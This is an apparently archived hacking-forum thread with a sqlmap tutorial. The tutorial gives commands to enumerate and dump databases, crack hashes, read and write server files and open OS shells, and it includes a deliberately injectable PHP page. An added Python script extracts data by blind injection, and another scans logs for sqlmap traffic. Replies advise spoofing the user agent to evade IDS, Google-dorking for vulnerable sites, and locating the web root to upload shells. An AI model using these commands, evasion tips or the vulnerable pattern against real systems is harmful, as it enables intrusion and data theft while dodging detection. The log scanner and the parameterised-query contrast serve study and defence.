EvilZone


: [tut] Sqlmap
: relax April 05, 2013, 09:52:13 PM
Now that the first issue of Evilzine (http://evilzone.org/news-and-announcements/evilzine-issue-1-2013-04-05/) is released, I thought I could post my sqlmap tutorial here to get comments on it.


SQLMAP; by relax

Rank on sectools.org: 30
Works on: Windows, Mac and Linux
Programmed in: Python
Price: free
Homepage: http://sqlmap.org/
Github: https://github.com/sqlmapproject/sqlmap
Wiki: https://github.com/sqlmapproject/sqlmap/wiki
 


Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's
responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not
responsible for any misuse or damage caused by this program, and neither do I, "relax".

Now with that said, let's start shall we? :D

Sqlmap is one of the best automated SQL injection tools out there, if not THE best.
It's an open-source Python project that can do in seconds what takes a human minutes or hours, if it is even possible to do at all.

Sqlmap has support for
I personally don't know Sqlmap that well except for some of the standard features and basic usage, but I
will try to give my view of it.
There are also different ways of using this tool depending on how well you know it,
how much noise you want to make, and how big the database is.

A good thing to remember is that all logs and database entries are saved in your output folder within your
Sqlmap folder.



Now let's boot up Sqlmap and look at the basics.

First off, we need to know what databases there are for us to explore:
./sqlmap.py -u "http://127.0.0.1/vurln.php?user=relax" --dbs --dbms=mysql

Tip:
  --threads=1
  If you want to send more requests at the same time; this is faster but it needs a good connection.

  --technique=BEUSTQ
  If you don't want to test all techniques because of noise or other reasons.

  If nothing is found you can try to increase:
  --level=(1-5)
  --risk=(0-3)


The output tells us that the site is vulnerable to:
boolean-based blind, error-based, UNION query and/or time-based blind SQL injection.

available databases [4]:
    information_schema
    mysql
    performance_schema
    vurln


vurln is the one we will explore to get some passwords from the awesome site 127.0.0.1 ^.^

./sqlmap.py -u "http://127.0.0.1/vurln.php?user=relax" -D vurln --tables
Output:
Database: vurln
[1 table]
+-------+
| users |
+-------+

./sqlmap.py -u "http://127.0.0.1/vurln.php?user=relax" -D vurln -T users --col
Output:
Database: vurln
Table: users
[3 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| ID       | tinyint(4)  |
| password | varchar(32) |
| username | varchar(20) |
+----------+-------------+

./sqlmap.py -u "http://127.0.0.1/vurln.php?user=relax" -D vurln -T users --dump
This will tell us it found possible hashes and will ask if we want to crack them with a dictionary attack and
password suffixes. This is a good feature but unfortunately pretty slow; using oclHashcat (GPU cracking)
would go much faster with a lot of entries and a big word list.

However this awesome site (127.0.0.1) is small so we will go for it.
Output:
Database: vurln
Table: users
[126 entries]
+----+----------+------------------------------------------+
| ID | username | password                                 |
+----+----------+------------------------------------------+
| 1  | admin    | 21232f297a57a5a743894a0e4a801fc3 (admin) |
| 2  | relax    | 098f6bcd4621d373cade4e832627b4f6 (test)  |
| 3  | Tadou    | 253614bbac999b38b5b60cae531c4969 (2012)  |
| 4  | Gevoo    | 98b1e16f65a1500023372d2b362c0991         |
| 5  | Beguu    | cff34ad343b069ea6920464ad17d4bcf         |
[...]



Let's look at some other scenarios.

If this site used a POST request instead of GET, we would specify that:
./sqlmap.py -u "http://127.0.0.1/vurln.php" --data="user=" --dbs

If you want to search for something specific, like columns with the name password:
./sqlmap.py -u "http://127.0.0.1/vurln.php" --data="user=" --search -C password
File features like:

Read:
./sqlmap.py -u "http://127.0.0.1/vurln.php" --data="user=" --file-read="/var/www/vurln.php"
This will save the remote file vurln.php locally in your output folder for the domain. You will need to know
the full path to the file; look at the full path disclosure vulnerability for more info about this.

Write:
./sqlmap.py -u "http://127.0.0.1/vurln.php" --data="user=" --file-write "i_was_never_here.txt" --file-dest "/var/www/i_was_never_here.txt"
Some shell features that are awesome to know:

OS shell:
./sqlmap.py -u "http://127.0.0.1/vurln.php" --data="user=" --os-shell

SQL shell:
./sqlmap.py -u "http://127.0.0.1/vurln.php" --data="user=" --sql-shell
Check my old tutorial about uploading a shell with SQL injection (https://evilzone.org/tutorials/upload-shell-with-sql-injection/) for more information about how to use it.
Remember, if you can't read/write files with the file features you should try the shell features.

Basic usage of Sqlmap is not harder than that, but just in case you haven't had enough yet, here are some
extra features:

If you're not afraid of noise:
./sqlmap.py -u "http://127.0.0.1/vurln.php?user=relax" --exclude-sysdbs --dump-all
This will give you everything except the system databases, in this case the "information_schema" and "mysql" databases.

For the curious user you have:
./sqlmap.py -g "inurl:index.php?id="
Google dork: this will find vulnerable sites from Google for you, but as stated above this is illegal unless you
have permission from the site owner and are following all applicable laws.

For those who want to be anonymous or extra careful:
--proxy=PROXY
--tor=ADDRESS
--tor-port=PORT
--check-waf
--crawl=DEPTH


The vurln.php file for the one who WILL test this legally >.>
(PHP)
<?php
// Deliberately vulnerable demo script: the request parameter is concatenated
// straight into the SQL string, which is the injection point sqlmap finds.
// Uses the legacy mysql_* extension, as in the original post.
if (isset($_POST['user'])) {
    $con = mysql_connect("localhost", "root", "password") or die(mysql_error());
    mysql_select_db("vurln", $con) or die(mysql_error());
    // No escaping and no parameter binding: a quote in $_POST['user'] breaks out of the literal
    $results = mysql_query("SELECT * FROM users WHERE username='" . $_POST['user'] . "'") or die(mysql_error());
    if (mysql_num_rows($results) === 0) {
        echo "Theres no user with that ID";
    } else {
        while ($row = mysql_fetch_array($results)) {
            echo "The user $row[username] has the ID $row[ID] <hr>";
        }
    }
}
?>

So what can we say about Sqlmap?
It is a very powerful tool, but like all automatic scanners it won't find everything; you will have to get your
hands dirty in a lot of cases. It also generates a lot of noise, which is a problem if you don't want to get spotted. But it is an
excellent tool that will do work for you that would otherwise take a lot longer or be
impossible.


/Relax
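The dump above comes out of sqlmap in one command. The script below is an added example (not from relax's post and not sqlmap's own code) that does the "boolean-based blind" part by hand against a copy of the vurln.php query, using an in-memory SQLite table with constructed rows in place of the tutorial's MySQL database. It shows what each boolean probe looks like, how many probes a 32-character hash costs, and that the same payload does nothing against a parameterised query. length() and substr() are the SQLite spellings; the names vulnerable_lookup, safe_lookup and blind_extract are this example's own, not sqlmap's.

```python
"""Boolean-based blind SQL injection by hand, against a copy of the vurln.php query.

Added example, not from the original post and not sqlmap code. The tutorial's
MySQL target is replaced with an in-memory SQLite table holding constructed rows
that mirror the first two entries of the dump; the SQL string is built exactly
the way vurln.php builds it.
"""
import sqlite3

# Constructed sample rows (hashes copied from the tutorial's dump output).
ROWS = [
    (1, "admin", "21232f297a57a5a743894a0e4a801fc3"),
    (2, "relax", "098f6bcd4621d373cade4e832627b4f6"),
]
HEX = "0123456789abcdef"  # the column holds MD5 hex digests, so this alphabet suffices


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (ID INTEGER, username TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)", ROWS)
    return con


def vulnerable_lookup(con, user):
    """Same flaw as vurln.php: the request parameter is glued into the query text."""
    sql = "SELECT * FROM users WHERE username='" + user + "'"
    return con.execute(sql).fetchall()


def safe_lookup(con, user):
    """Parameterised version: whatever the client sends is only ever a username value."""
    return con.execute("SELECT * FROM users WHERE username=?", (user,)).fetchall()


def user_exists(con, user):
    """The attacker's only observable: vurln.php prints a user line or 'no user'.

    A query error is treated like 'no user', so a malformed probe simply reads as false.
    """
    try:
        return len(vulnerable_lookup(con, user)) > 0
    except sqlite3.Error:
        return False


def blind_extract(con, target_user, column):
    """Recover users.<column> for target_user one yes/no question at a time.

    This is what sqlmap automates when it reports 'boolean-based blind': every
    payload closes the string literal, appends a condition on the secret and
    comments out the application's trailing quote. Returns (value, probes_sent).
    """
    probes = 0
    # Step 1: find the length of the secret (hashes are short, so cap at 64).
    length = 0
    for n in range(1, 65):
        probes += 1
        if user_exists(con, f"{target_user}' AND length({column})={n}-- "):
            length = n
            break
    # Step 2: one candidate character per probe at each position.
    recovered = ""
    for pos in range(1, length + 1):
        for ch in HEX:
            probes += 1
            if user_exists(con, f"{target_user}' AND substr({column},{pos},1)='{ch}'-- "):
                recovered += ch
                break
        else:
            # No hex digit matched: the alphabet assumption is wrong for this column.
            return recovered, probes
    return recovered, probes


if __name__ == "__main__":
    db = make_db()
    value, sent = blind_extract(db, "admin", "password")
    print(f"admin password column = {value} ({sent} probes)")
    # The same payload is harmless against the parameterised query:
    print("safe_lookup with a payload ->", safe_lookup(db, "admin' AND 1=1-- "))
```

Every probe here is one HTTP request in the real run, which is why a 126-row dump over boolean-based blind alone is slow and noisy, and why sqlmap prefers UNION or error-based techniques when the target allows them.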
: Re: [tut] Sqlmap
: vezzy April 06, 2013, 01:57:20 AM
Not bad. I like your use of practical scenarios. Adds a little touch over the official documentation.

Also, holy shit, Evilzine is out. hhfhgfgdfdhgf
: Re: [tut] Sqlmap
: Evilone May 09, 2013, 07:22:06 PM
Please also use --random-agent as it will mask the default user agent which shows up in the apache logs as "SQLmap"; if you don't do this it's pretty trivial to get flagged by WAF/IDS/IPS and it's easy for a sysadmin to see how the attack went down.
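Evilone's point about the default User-Agent is easy to check on the server side. The script below is an added example (not from the thread and not sqlmap code) that scans constructed Apache combined-format log lines modelled on the tutorial's run. It relies on one fact about sqlmap: its default User-Agent begins with "sqlmap/" unless --random-agent or --user-agent overrides it. The log lines, the exact UA strings and the payload patterns are assumptions made up for the example. The caveat it demonstrates: masking the agent removes only the first flag; the injected query strings still stand out in the access log.

```python
"""Spotting sqlmap in Apache combined-format access logs.

Added example, not part of the thread and not sqlmap code. The only fact it
relies on is that sqlmap's default User-Agent starts with 'sqlmap/'; the log
lines below are constructed to look like the tutorial's run, with one request
sent under --random-agent style browser agents.
"""
import re
from urllib.parse import unquote_plus

# Constructed Apache combined-log lines (not real traffic).
LOG_LINES = [
    '127.0.0.1 - - [05/Apr/2013:21:52:13 +0200] "GET /vurln.php?user=relax HTTP/1.1" 200 97 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64) Firefox/20.0"',
    '127.0.0.1 - - [05/Apr/2013:21:52:14 +0200] "GET /vurln.php?user=relax%27%20AND%201%3D1--%20 HTTP/1.1" 200 97 "-" '
    '"sqlmap/1.0-dev (http://sqlmap.org)"',
    '127.0.0.1 - - [05/Apr/2013:21:52:15 +0200] "GET /vurln.php?user=relax%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL--%20 HTTP/1.1" 200 312 "-" '
    '"Mozilla/5.0 (Windows NT 6.1; WOW64) Chrome/26.0"',
    '127.0.0.1 - - [05/Apr/2013:21:52:16 +0200] "GET /vurln.php?user=relax%27%20AND%20SLEEP%285%29--%20 HTTP/1.1" 200 97 "-" '
    '"Mozilla/5.0 (Windows NT 6.1; WOW64) Chrome/26.0"',
]

# Apache "combined" format: host ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Applied to the URL-decoded request line; shapes taken from the techniques the
# tutorial's run reported (boolean, UNION, time-based) plus the comment terminator.
PAYLOAD_PATTERNS = [
    ("union-select", re.compile(r"\bUNION\b.*\bSELECT\b", re.I)),
    ("boolean", re.compile(r"\b(?:AND|OR)\b\s+\S+\s*=\s*\S+", re.I)),
    ("time-based", re.compile(r"\bSLEEP\s*\(|\bBENCHMARK\s*\(|\bWAITFOR\s+DELAY\b", re.I)),
    ("comment-terminator", re.compile(r"--\s|/\*|#")),
]


def analyse(line):
    """Return a finding dict for one log line, or None if it is unparseable or clean."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ua = m.group("ua")
    decoded = unquote_plus(m.group("path"))  # payloads are percent-encoded on the wire
    flags = []
    if ua.lower().startswith("sqlmap/"):
        flags.append("sqlmap-user-agent")  # gone as soon as --random-agent is used
    for name, pattern in PAYLOAD_PATTERNS:
        if pattern.search(decoded):
            flags.append(name)  # survives any user-agent masking
    if not flags:
        return None
    return {"ip": m.group("ip"), "ts": m.group("ts"), "path": decoded, "ua": ua, "flags": flags}


def scan(lines):
    """Findings for every flagged line, in log order."""
    return [f for f in map(analyse, lines) if f]


if __name__ == "__main__":
    for f in scan(LOG_LINES):
        print(f["ts"], f["ip"], ",".join(f["flags"]), f["path"])
```

Run against a real access log the same way (iterate the file instead of LOG_LINES). The second line is caught twice, by the agent string and by the payload; the third and fourth lines carry browser agents and are still caught by the payload patterns alone.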
: Re: [tut] Sqlmap
: relax May 09, 2013, 08:03:41 PM
Yeah, it's a good point; there are even commands to check for a WAF :P
: Re: [tut] Sqlmap
: mrflex June 15, 2013, 04:50:41 AM
Thank you very much I have been looking for a good SQLMAP tutorial :)
: Re: [tut] Sqlmap
: Sunshie August 21, 2013, 03:44:31 AM
http://www.ersec.org/
: Re: [tut] Sqlmap
: AnarchyAngel August 21, 2013, 03:43:26 PM
would be nice to see what you do to find web root for uploading shells if there is no path disclosure with sql error output. I usually try looking in http server config files but they can be a bitch to find.
: Re: [tut] Sqlmap
: Stackprotector August 27, 2013, 04:18:41 PM
> would be nice to see what you do to find web root for uploading shells if there is no path disclosure with sql error output. I usually try looking in http server config files but they can be a bitch to find.
Try to get another error :). A nice tactic is to supply an array instead of one value in the GET parameters. For example, instead of google.com/?q=lol, request google.com/?q[]=lol to get an error on loads of sites.